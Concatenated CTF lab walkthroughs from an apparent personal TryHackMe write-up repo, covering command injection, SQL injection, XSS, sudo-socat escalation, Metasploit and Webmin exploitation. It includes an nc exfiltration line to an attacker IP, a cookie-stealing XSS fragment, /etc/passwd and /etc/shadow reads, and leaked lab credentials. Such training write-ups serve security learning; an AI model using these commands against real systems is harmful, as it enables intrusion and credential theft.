sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false falconfeast:x:1000:1000:falconfeast,,,:/home/falconfeast:/bin/bash #falconfeast:rootpassword sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:116:MySQL Server,,,:/nonexistent:/bin/false 53 | ``` 54 | if you look carefully you will see a user cerdential + password. now ssh it to the machine 55 | ```console 56 | kali@kali:~$ ssh falconfeast@10.10.14.166 57 | falconfeast@inclusion:~$ ls 58 | articles user.txt 59 | falconfeast@inclusion:~$ cat user.txt 60 | ``` 61 | 62 | # root 63 | start by checking sudo command that falconfeast allow to run as root 64 | ```console 65 | falconfeast@inclusion:~$ sudo -l 66 | Matching Defaults entries for falconfeast on inclusion: 67 | env_reset, mail_badpass, 68 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 69 | 70 | User falconfeast may run the following commands on inclusion: 71 | (root) NOPASSWD: /usr/bin/socat 72 | ``` 73 | 74 | ## socat 75 | - [socat](https://linux.die.net/man/1/socat) 76 | - [more about socat](https://medium.com/@copyconstruct/socat-29453e9fc8a6) 77 | - [GTFObin](https://gtfobins.github.io/gtfobins/socat/) 78 | ```console 79 | falconfeast@inclusion:~$ sudo socat stdin exec:/bin/sh 80 | whoami 81 | root 82 | cat /root/root.txt 83 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/Injection.md: -------------------------------------------------------------------------------- 1 | Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers 2 | 3 | # NOTE 4 | - dont for get ```;``` 5 | 6 | # Blind Command Injection 7 | Blind command injection occurs when the system call that's being made does not return the response of the call to the Document Object Model (or DOM). 8 | 9 | ![php](https://i.imgur.com/lB8diiC.png) 10 | 11 | blind command injection occurs when the response of the HTTP request is not returned to the DOM. You can see in the above code that the response is never returned anywhere on the page. The only thing that gets returned is an alert that says whether a user was found on the system or not. For the purposes of this room, I made the alert tell you what was going on, but sometimes it won't be that easy. So here are a few ways to tell whether you have blind command injection or not. 12 | 13 | ## Ping! 14 | Since the code is making a system call in some way, a ping will cause the page to continue loading until the command has completed. So if you send a ping with 10 ICMP packets, the page should be loading for about 10 seconds. 15 | 16 | ## Redirection of Output 17 | 18 | Ping is usually enough to tell you whether you have blind command injection, but if you want to test further, you can attempt to redirect the output of a command to a file, then, using the browser, navigate to the page where the file is stored. We all know the `>` Bash operator redirects output to a file or process so you could try redirecting the output of `id`, `whoami`, `netstat`, `ip addr` or other useful command to see if you can see the results. 19 | 20 | ## Bypassing the Blind Injection with Netcat 21 | 22 | In the spirit of full disclosure, there is a way to bypass the blind injection with netcat. You are able to pipe the output of a command to a nc listener. You could do something like ```root; ls -la | nc {YOUR_IP} {PORT}``` . This will send the output of ls -la to your netcat listener. 23 | 24 | ## Action 25 | 1. Ping the box with 10 packets. What is this command (without IP address)? 26 | ```; ping -c ``` 27 | 2. Redirect the box's Linux Kernel Version to a file on the web server. What is the Linux Kernel Version? 28 | ```; uname -r > linux.txt```. Now http:///linux.txt 29 | 30 | more command to get kernal version? 31 | ```console 32 | $ uname -a 33 | $ cat /proc/version 34 | $ dmesg | grep Linux 35 | ``` 36 | just for fun I did: ```; cat /etc/passwd > pass.txt``` this is what I found. lol fist time os inject super cool!! 37 | ``` 38 | root:x:0:0:root:/root:/bin/bash 39 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 40 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 41 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 42 | sync:x:4:65534:sync:/bin:/bin/sync 43 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 44 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 45 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 46 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 47 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 48 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 49 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 50 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 51 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 52 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 53 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 54 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 55 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 56 | systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin 57 | systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 58 | syslog:x:102:106::/home/syslog:/usr/sbin/nologin 59 | messagebus:x:103:107::/nonexistent:/usr/sbin/nologin 60 | _apt:x:104:65534::/nonexistent:/usr/sbin/nologin 61 | lxd:x:105:65534::/var/lib/lxd/:/bin/false 62 | uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin 63 | dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin 64 | landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin 65 | pollinate:x:109:1::/var/cache/pollinate:/bin/false 66 | sshd:x:110:65534::/run/sshd:/usr/sbin/nologin 67 | ``` 68 | 69 | # Active Command Injection 70 | Active command injection will return the response to the user. It can be made visible through several HTML elements. 71 | 72 | 73 | `passthru()` on [PHP's website](https://www.php.net/manual/en/function.passthru.php), 74 | 75 | ## Commands to try 76 | 77 | **Linux** 78 | - whoami 79 | - id 80 | - ifconfig/ip addr 81 | - uname -a 82 | - ps -ef 83 | 84 | **Windows** 85 | - whoami 86 | - ver 87 | - ipconfig 88 | - tasklist 89 | - netstat -an 90 | 91 | 4. What is the user's shell set as? 92 | ```cat /etc/passwd | grep www-data``` 93 | 94 | 5. What version of Ubuntu is running? 95 | ```lsb_release -a``` 96 | 6. Print out the MOTD. What favorite beverage is shown? 97 | read more about motd [MOTD](https://serverfault.com/questions/481146/there-are-two-motds-shown-when-i-login-to-my-server-using-ssh) 98 | ```console 99 | $ find / -name 00-header; 2> /dev/null 100 | /snap/core/8268/etc/update-motd.d/00-header 101 | /snap/core/9066/etc/update-motd.d/00-header 102 | /etc/update-motd.d/00-header 103 | ``` 104 | # flag 105 | ```console 106 | $ find / -name flag.txt; 2> /dev/null 107 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/JuiceShop.md: -------------------------------------------------------------------------------- 1 | # Broken authen 2 | ## Jim reset password 3 | - jim@juice-sh.op 4 | - check all review in the shop and google more about him 5 | - https://en.wikipedia.org/wiki/James_T._Kirk 6 | - James Kirk's brother, George Samuel Kirk, is first mentioned in 7 | ## admin password... 8 | just try easy well know password 9 | # Sensitive Data Exposure 10 | - /#/about 11 | - something interesting in `legel.md` download link 12 | # Broken Access Control 13 | 1. Access the administration section of the store - What is the name of the page? 14 | - open devtool and check main.js 15 | - search for `admin` 16 | 2. devtool -> Storage -> user session storage 17 | 3. go to administration section and remove it 18 | # XSS 19 | - find iframe tag payload 20 | 21 | 22 | # bonus track 23 | just me try to learn how to craft xss for sending cookie to my server (nc) 24 | ```js 25 | 26 | 27 | 28 | 'http://:/?cookie=' + encodeURI(document.cookie); 29 | 30 | // works 31 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/Pokemon.md: -------------------------------------------------------------------------------- 1 | # recon 2 | Like always, start with nmap. I use my own tool to automate nmap scan, check it out [pymap](https://github.com/gu2rks/pymap) 3 | ```console 4 | $ python3 pymap.py -t $IP 5 | ``` 6 | There are 2 open ports: 7 | - 22/tcp open ssh 8 | - 80/tcp open http 9 | 10 | If web is up, I alway start with running `gobuster` to brute forcing web directory. While `gobuster` is running, I explore the web or walking the "happy path" by using the web in the way it was meant to be used by a normal user. 11 | 12 | ## rabbit hole + user credential 13 | I start by checking the source code and I found this: 14 | ``. ofc I open dev-tool and check what is in the console. I found the array with then pokemon name... 15 | ```js 16 | [ 17 | "Bulbasaur", 18 | "Charmander", 19 | "Squirtle", 20 | "Snorlax", 21 | "Zapdos", 22 | "Mew", 23 | "Charizard", 24 | "Grimer", 25 | "Metapod", 26 | "Magikarp" 27 | ] 28 | ``` 29 | more over I found this js script. 30 | ```js 31 | 48 | ``` 49 | I try to understand it but it seem like it lead me nowhere... So I go back to the source and check it again in case I missed something. 50 | 51 | 52 | Yep I missed not just something. There is username:password hidden somewhere close to ``. But I was so focus on check console log message....... 53 | 54 | # foot hold 55 | now that we have user credential. Lets ssh to the victim server and enumerate the server a bit. 56 | 57 | ```console 58 | pokemon@root:~$ sudo -l 59 | [sudo] password for pokemon: 60 | Sorry, user pokemon may not run sudo on root. 61 | pokemon@root:~$ id 62 | uid=1000(pokemon) gid=1000(pokemon) groups=1000(pokemon),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare) 63 | 4096 Jun 24 13:48 .. 64 | drwx------ 6 root root 4096 Jun 24 14:14 ash 65 | drwxr-xr-x 18 pokemon pokemon 4096 Aug 10 09:53 pokemon 66 | -rwx------ 1 ash root 8 Jun 22 23:21 roots-pokemon.txt 67 | ``` 68 | so as you can see, the current user is not allow to run sudo. Moreover, there are 2 users in this server. the current user and `ash`. I assume that `ash` is a root user since he is main guy in pokemon :P. 69 | 70 | now let enumerate more. and I end up find a `.zip` file in `Desktop`. Unzip and u will find our fist flag!! 71 | ```console 72 | pokemon@root:~$ cd Desktop/ 73 | pokemon@root:~/Desktop$ ls 74 | P0kEmOn.zip 75 | pokemon@root:~/Desktop$ unzip P0kEmOn.zip 76 | Archive: P0kEmOn.zip 77 | creating: P0kEmOn/ 78 | inflating: P0kEmOn/grass-type.txt 79 | pokemon@root:~/Desktop$ ls 80 | P0kEmOn P0kEmOn.zip 81 | pokemon@root:~/Desktop$ cd P0kEmOn/ 82 | pokemon@root:~/Desktop/P0kEmOn$ ls 83 | grass-type.txt 84 | pokemon@root:~/Desktop/P0kEmOn$ cat grass-type.txt 85 | 50 __ __ __ __ __ __ 86 | ``` 87 | the flag is encoded, decode it and submit the flag! 88 | 89 | 90 | At this point we know the format of the flag. We can craft a simple regex to and using `find` to look for more flags. The name of the 1st flag call `grass-type.txt`. So I assume that the flag should looks something likt `pokemontype-type.txt`. Where *pokemontype* can be grass, frie, water, electric, etc. The regex will be `*-type.txt` 91 | 92 | 93 | now let run find command 94 | ```console 95 | pokemon@root:~$ find / -user pokemon -name *type.txt 2> /dev/null 96 | /var/www/html/water-type.txt 97 | /home/pokemon/Desktop/P0kEmOn/grass-type.txt 98 | ``` 99 | Bingo ! grab the flag! note that the flag is encoded (agian). Decoded and submit the flag 100 | **hint**:
ROT
101 | 102 | 103 | The current user home directory is huge. There are many sub directory and such. let enumerate all of them at ones with `pokemon@root:~$ ls -la *`. you will find a really interesting directory. Dig deeper and you will find a file call `Could__________for?.cplusplus` 104 | 105 | ```console 106 | pokemon@root:~/__________$ cat Could__________for?.cplusplus 107 | # include 108 | 109 | int main() { 110 | std::cout << "ash : " 111 | return 0; 112 | } 113 | ``` 114 | 115 | We found a `ash` credential which I gussed that he is a root user. now let log into `ash` 116 | 117 | # root 118 | there is many way to log into as `ash`. You can `ssh` as `ash` or use `su`. In this case, I will use `su`: 119 | ```console 120 | pokemon@root:~$ su ash 121 | Password: 122 | To run a command as administrator (user "root"), use "sudo ". 123 | See "man sudo_root" for details. 124 | 125 | bash: /home/ash/.bashrc: Permission denied 126 | ash@root:/home/pokemon$ 127 | ``` 128 | yea let grab the `roots-pokemon.txt`. 129 | ```console 130 | ash@root: cat /home/roots-pokemon.txt 131 | ``` 132 | we still have need to find the 3rd flag. Since we already have the regex for finding the flag, let re-use it again!! 133 | ```console 134 | ash@root:/$ find / -user ash -name *type.txt 2> /dev/null 135 | ash@root:/$ find / -user root -name *type.txt 2> /dev/null 136 | /____/________/fire-type.txt 137 | ``` 138 | Grab the flag and decode it 139 | **hint**:
BASE__
, GL and happy hacking -------------------------------------------------------------------------------- /TryHackMe/Easy/PostExploitationBasics.md: -------------------------------------------------------------------------------- 1 | # Post-Exploitation Basics 2 | Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. https://tryhackme.com/room/postexploit 3 | 4 | ## [Task 2] Enumeration w/ Powerview 5 | ssh to the target. run ```powershell -ep bypass```. ```-ep bypass``` allow you to PowerShell execution policy. The PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be run on the system. By default it is set to “Restricted“, which basically means none. However, it’s important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That’s why there are so many options for working around it. for more info read [this](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) 6 | 7 | 8 | since we included ```-ep bypass```. we will be able to execute ```PowerView``` 9 | ```ps 10 | PS C:\Users\Administrator> . .\Downloads\PowerV 11 | iew.ps1 12 | ``` 13 | now let enumerate the domain using ```Get-NetUser``` 14 | ```ps 15 | PS C:\Users\Administrator> Get-NetUser | select cn # getting all users 16 | 17 | cn 18 | -- 19 | Administrator 20 | Guest 21 | krbtgt 22 | Machine-1 23 | Admin2 24 | Machine-2 25 | SQL Service 26 | POST{P0W3RV13W_FTW} 27 | sshd 28 | PS C:\Users\Administrator> Get-NetGroup -GroupName *admin* # Enumerate the domain groups with admin as regex 29 | Administrators 30 | Hyper-V Administrators 31 | Storage Replica Administrators 32 | Schema Admins 33 | Enterprise Admins 34 | Domain Admins 35 | Key Admins 36 | Enterprise Key Admins 37 | DnsAdmins 38 | ``` 39 | -------------------------------------------------------------------------------- /TryHackMe/Easy/RP: Metasploit.md: -------------------------------------------------------------------------------- 1 | # Task 5: Move the shell 2 | ``` 3 | Remember that database we set up? In this step, we're going to take a look at what we can use it for and exploit our victim while we're at it! 4 | 5 | As you might have noticed, up until this point we haven't touched nmap in this room, let alone perform much recon on our victim box. That'll all change now as we'll take a swing at using nmap within Metasploit. Go ahead and deploy the box now, it may have up to a three-minute delay for starting up our target vulnerable service. 6 | 7 | *Note, Metasploit does support different types of port scans from within the auxiliary modules. Metasploit can also import other scans from nmap and Nessus just to name a few. 8 | ``` 9 | 10 | 2. What service does nmap identify running on port 135? 11 | ```db_nmap -sV 10.10.127.144 -p 135``` 12 | 3. Let's go ahead and see what information we have collected in the database. Try typing the command '```hosts```' into the msfconsole now. 13 | 4. How about something else from the database, try the command '```services```' now. 14 | 5. One last thing, try the command '```vulns```' now. This won't show much at the current moment, however, it's worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully. 15 | 6. Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type 'use' followed by a unique string found within only the target exploit. For example, try this out now with the following command 'use icecast'. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start 16 | 17 | Dont have energy to copy stuff so here is my note: 18 | ```console 19 | $msfconsole 20 | $set PAYLOAD windows/meterpreter/reverse_tcp # set payload 21 | $set LHOST # 22 | $search # search for exploit 23 | $use # select the exploit 24 | $set RHOST 25 | $set RPORT 26 | $run -j # run the exploit 27 | $expolit # run the exploit 28 | $jobs # check all jobs run on the system 29 | $sessions # list all sessions 30 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/RP:Nmap.md: -------------------------------------------------------------------------------- 1 | to read [link](https://docs.google.com/document/d/1q0FziVZM3zCWhcgtPpljVPzkBX0fMAh6ebrXVM5rg08/edit) 2 | 3 | # Nmap Quiz 4 | 1. help = -h 5 | 2. Syn Scan = -sS 6 | 3. UDP Scan = -sU 7 | 4. OS detection = -O 8 | 5. service verstion detection = -sV 9 | 6. verbosity flag = -v 10 | 7. very verbose = -vv 11 | 8. output in xml format = -oX 12 | 9. Aggressive scan = -A 13 | 10. set timing to max = -T5 (1-5) 14 | 11. specific port = -p 15 | 12. every port = -p- 16 | 13. use a script = --script 17 | 14. use script in vulnerability category = --script vuln 18 | 15. skip ping = -Pn 19 | 20 | # Nmap Scanning 21 | 1. syn scan = ```nmap -sS``` 22 | 2. scanning first 10000 port = ```2``` 23 | ```console 24 | nmap -sS 10.10.121.13 25 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:48 EDT 26 | Nmap scan report for 10.10.121.13 27 | Host is up (0.047s latency). 28 | Not shown: 998 closed ports 29 | PORT STATE SERVICE 30 | 22/tcp open ssh 31 | 80/tcp open http 32 | ``` 33 | 3. communication protocol of the open ports = ```tcp``` 34 | 4. service version on SSH = ```6.6.1p1``` 35 | ```console 36 | root@kali:~# nmap -sV -p 22 10.10.121.13 37 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:50 EDT 38 | Nmap scan report for 10.10.121.13 39 | Host is up (0.046s latency). 40 | 41 | PORT STATE SERVICE VERSION 42 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0) 43 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 44 | 45 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 46 | Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds 47 | ``` 48 | 5. find out what flag on port 80 by performing an aggressive scan = ```httponly``` 49 | ```console 50 | root@kali:~# nmap -A -p 80 10.10.121.13 51 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:51 EDT 52 | Nmap scan report for 10.10.121.13 53 | Host is up (0.044s latency). 54 | 55 | PORT STATE SERVICE VERSION 56 | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 57 | | http-cookie-flags: 58 | | /: 59 | | PHPSESSID: 60 | |_ httponly flag not set 61 | | http-robots.txt: 1 disallowed entry 62 | |_/ 63 | |_http-server-header: Apache/2.4.7 (Ubuntu) 64 | | http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop... 65 | |_Requested resource was login.php 66 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 67 | Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%), Android 7.1.1 - 7.1.2 (92%) 68 | No exact OS matches for host (test conditions non-ideal). 69 | Network Distance: 2 hops 70 | 71 | TRACEROUTE (using port 80/tcp) 72 | HOP RTT ADDRESS 73 | 1 45.09 ms 10.9.0.1 74 | 2 43.99 ms 10.10.121.13 75 | 76 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 77 | Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds 78 | ``` 79 | 6. Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. = ```http-slowris-check``` 80 | ```console 81 | root@kali:~# nmap --script vuln -p 80 10.10.121.13 82 | Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:56 EDT 83 | Nmap scan report for 10.10.121.13 84 | Host is up (0.045s latency). 85 | 86 | PORT STATE SERVICE 87 | 80/tcp open http 88 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 89 | | http-cookie-flags: 90 | | /: 91 | | PHPSESSID: 92 | | httponly flag not set 93 | | /login.php: 94 | | PHPSESSID: 95 | |_ httponly flag not set 96 | |_http-csrf: Couldn't find any CSRF vulnerabilities. 97 | |_http-dombased-xss: Couldn't find any DOM based XSS. 98 | | http-enum: 99 | | /login.php: Possible admin folder 100 | | /robots.txt: Robots file 101 | | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 102 | | /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 103 | |_ /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)' 104 | | http-slowloris-check: 105 | | VULNERABLE: 106 | | Slowloris DOS attack 107 | | State: LIKELY VULNERABLE 108 | | IDs: CVE:CVE-2007-6750 109 | | Slowloris tries to keep many connections to the target web server open and hold 110 | | them open as long as possible. It accomplishes this by opening connections to 111 | | the target web server and sending a partial request. By doing so, it starves 112 | | the http server's resources causing Denial Of Service. 113 | | 114 | | Disclosure date: 2009-09-17 115 | | References: 116 | | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 117 | |_ http://ha.ckers.org/slowloris/ 118 | |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 119 | 120 | Nmap done: 1 IP address (1 host up) scanned in 321.99 seconds 121 | ``` -------------------------------------------------------------------------------- /TryHackMe/Easy/Smag-Grotto.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kurohat/writeUp/438003d46e13c27bcafb4136b75344c2af39f762/TryHackMe/Easy/Smag-Grotto.md -------------------------------------------------------------------------------- /TryHackMe/Easy/bolt.md: -------------------------------------------------------------------------------- 1 | # recon 2 | 3 open ports: 3 | - 22/tcp open ssh 4 | - 80/tcp open http, *apache it working page* 5 | - 8000/tcp open http-alt 6 | 7 | 8 | ## port 8000 9 | - admin = Jake 10 | ```console 11 | $ gobuster dir -u http://$IP:8000/ -w /usr/share/SecLists/Discovery/Web-Content/big.txt -t 54 12 | . 13 | /.htaccess (Status: 200) 14 | /async (Status: 401) 15 | /entries (Status: 200) 16 | /pages (Status: 200) 17 | /search (Status: 200) 18 | . 19 | ``` 20 | notthing interesting from gobuster 21 | 22 | let do a *happy path*, there are two posts: 23 | - `entry/message-for-it-department` -> t! my password is `boltadmin123` just incase you need it! 24 | - `/entry/message-from-admin`: myself Jake and my username is bolt 25 | 26 | then I found link to this site https://bolt.cm/. The link can be found on `navbar` (The Bolt Site) and site footer (© 2020 • This website is Built with Bolt.) After some digging I found a cms/log in page: `/bolt` 27 | 28 | now log into the cms using the credential we found here. Note that the website use **Bolt Version: 3.7.1**. If you goolge about bolt exploit you will easily find a RCE exploit on metasploit (check [here](https://www.rapid7.com/db/modules/exploit/unix/webapp/bolt_authenticated_rce)) 29 | 30 | so no more talk let run metasploit and get foothold 31 | 32 | # foot hold/root 33 | follow the steps on rapid7 link above, you need to `set` username,password,rhost, and lhost then `run` 34 | 35 | Boom! you should get foothold to victim's server. run `which python/python3` to check if `python2.7` or `python3` is installed. we will use it to spawn a *tty shell* 36 | 37 | ```console 38 | which python3 39 | /usr/bin/python3 40 | python3 -c 'import pty; pty.spawn("/bin/sh")' 41 | # whoami 42 | whoami 43 | root 44 | # pwd 45 | pwd 46 | /home 47 | # ls 48 | ls 49 | bolt composer-setup.php flag.txt 50 | ``` 51 | luckly we gain root by just get foothold, you see why you should not run any service on ur server as a root. coz if someone hack you, they gain root access on ur server at ones. 52 | -------------------------------------------------------------------------------- /TryHackMe/Easy/gamezone.md: -------------------------------------------------------------------------------- 1 | # what I learned 2 | - sqlmap 3 | - checking opent socket connection `ss -tulpn` 4 | - Reverse SSH port forwarding 5 | - read more about exploit, msfconsole is not only one solution. you can try something else too. 6 | 7 | 8 | # enumerate 9 | - 22/tcp open ssh 10 | - 80/tcp open http 11 | - Apache/2.4.18 (Ubuntu) 12 | - **gobuster** 13 | - /images (Status: 301) 14 | - /index.php (Status: 200) 15 | - /portal.php (Status: 302) 16 | 17 | # foothold 18 | the log in form is vulnerable to SQLi. I try username `admin`, pass `' or 1=1 -- -` but it didnt works. I then try to insert `' or 1=1 -- -` as username instead. 19 | 20 | Vola, it redirected me to */portal.php*. there is a search form that can be use to searching for a game review. is it also vulnerable to SQLi?. let insert `' or 1=1 -- -` in the search form. 21 | 22 | ![sqli](pic/Screenshot%202020-07-27%20at%2012.32.50.png) 23 | 24 | yep we got all the reviewed game. which mean it is vulnerable to SQLi. 25 | 26 | now we gonna use SQLmap which is a automatic SQL injection and database takeover tool. the plan is use it to dump the whole database. let start with open *burpsuite* and intercept the get request when we using search bar. 27 | 28 | copy all reqest header and save it in a .txt file. we will use it in SQLmap. 29 | 30 | ```console 31 | kali@kali:~/THM/game$ ls 32 | req.txt 33 | kali@kali:~/THM/game$ head req.txt 34 | POST /portal.php HTTP/1.1 35 | Host: 10.10.102.254 36 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 38 | Accept-Language: en-US,en;q=0.5 39 | Accept-Encoding: gzip, deflate 40 | Referer: http://10.10.102.254/portal.php 41 | Content-Type: application/x-www-form-urlencoded 42 | Content-Length: 28 43 | Connection: close 44 | kali@kali:~/THM/game$ sqlmap -r req.txt --dbms=mysql --dump 45 | ``` 46 | you will get 2 table. 47 | 1. post: contains all game review 48 | 2. user: user:password 49 | 50 | now let crack the password using *hashcat* 51 | ```console 52 | $ hashcat -m 1400 -a 0 -o crack.txt 'hash' /usr/share/wordlists/rockyou.txt --force 53 | ``` 54 | now ssh to the server and get user flag 55 | ```console 56 | agent47@gamezone:~$ sudo -l 57 | [sudo] password for agent47: 58 | Sorry, user agent47 may not run sudo on gamezone. 59 | ``` 60 | # root 61 | check socket connections: 62 | ```console 63 | agent47@gamezone:~$ ss -tulpn 64 | Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port 65 | udp UNCONN 0 0 *:10000 *:* 66 | udp UNCONN 0 0 *:68 *:* 67 | tcp LISTEN 0 80 127.0.0.1:3306 *:* 68 | tcp LISTEN 0 128 *:10000 *:* 69 | tcp LISTEN 0 128 *:22 *:* 70 | tcp LISTEN 0 128 :::80 :::* 71 | tcp LISTEN 0 128 :::22 :::* 72 | ``` 73 | use `curl` to flind more about web socket port 10000. seem like it run `Webmin`. now let check `ps aux` and find out if webmin is run by root. if so we migh can use it to escalate and gain root priv. 74 | 75 | ```console 76 | agent47@gamezone:~$ ps aux | grep webmin 77 | root 1235 0.0 1.2 75020 25928 ? Ss 05:11 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf 78 | ``` 79 | Bingo ! webmin is running by root 80 | 81 | 82 | We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the `IPtable` list). However, Using an SSH Tunnel we can expose the port to us (locally)! 83 | 84 | 85 | If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do `ssh -L 9000:imgur.com:80 user@example.com.` Going to `localhost:9000` on your machine, will load imgur traffic using your other server. 86 | 87 | on kali 88 | ```console 89 | kali@kali:~/THM/game$ ssh -L 9999:localhost:10000 agent47@$IP 90 | ``` 91 | now visite localhost:9999. I tried to loging with defualt credential but it didnt works. I then try using agent47 credential. Bingo ! 92 | 93 | after I got ther webmin version and research about exploit. I found [this](https://www.rapid7.com/db/modules/exploit/unix/webapp/webmin_show_cgi_exec) so let use `msfconsole` then 94 | 95 | 96 | Damn it! it didnt works for me. then I found [this](https://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf) in References of the msf modules link (previous link) 97 | 98 | 99 | read page 2 under *3 Technical Explanation* you will find some juciy infomation. 100 | `“https://webminserver.dom.com/file/show.cgi/bin/echo|ls%20–la|”` 101 | you can manipulate this the last part of url (after `/file/show.cgi/bin/`) and make it return the file you want. 102 | 103 | 104 | 105 | **hint**: `/file/show.cgi/bin/echo|cat%20 something` 106 | you want to get root access? use the same method but cat /etc/shadow instead then crack root's password. 107 | 108 | GLHF 109 | -------------------------------------------------------------------------------- /TryHackMe/Easy/gaming-server.md: -------------------------------------------------------------------------------- 1 | # recon 2 | - nmap 3 | ``` 4 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 5 | | ssh-hostkey: 6 | | 2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA) 7 | | 256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA) 8 | |_ 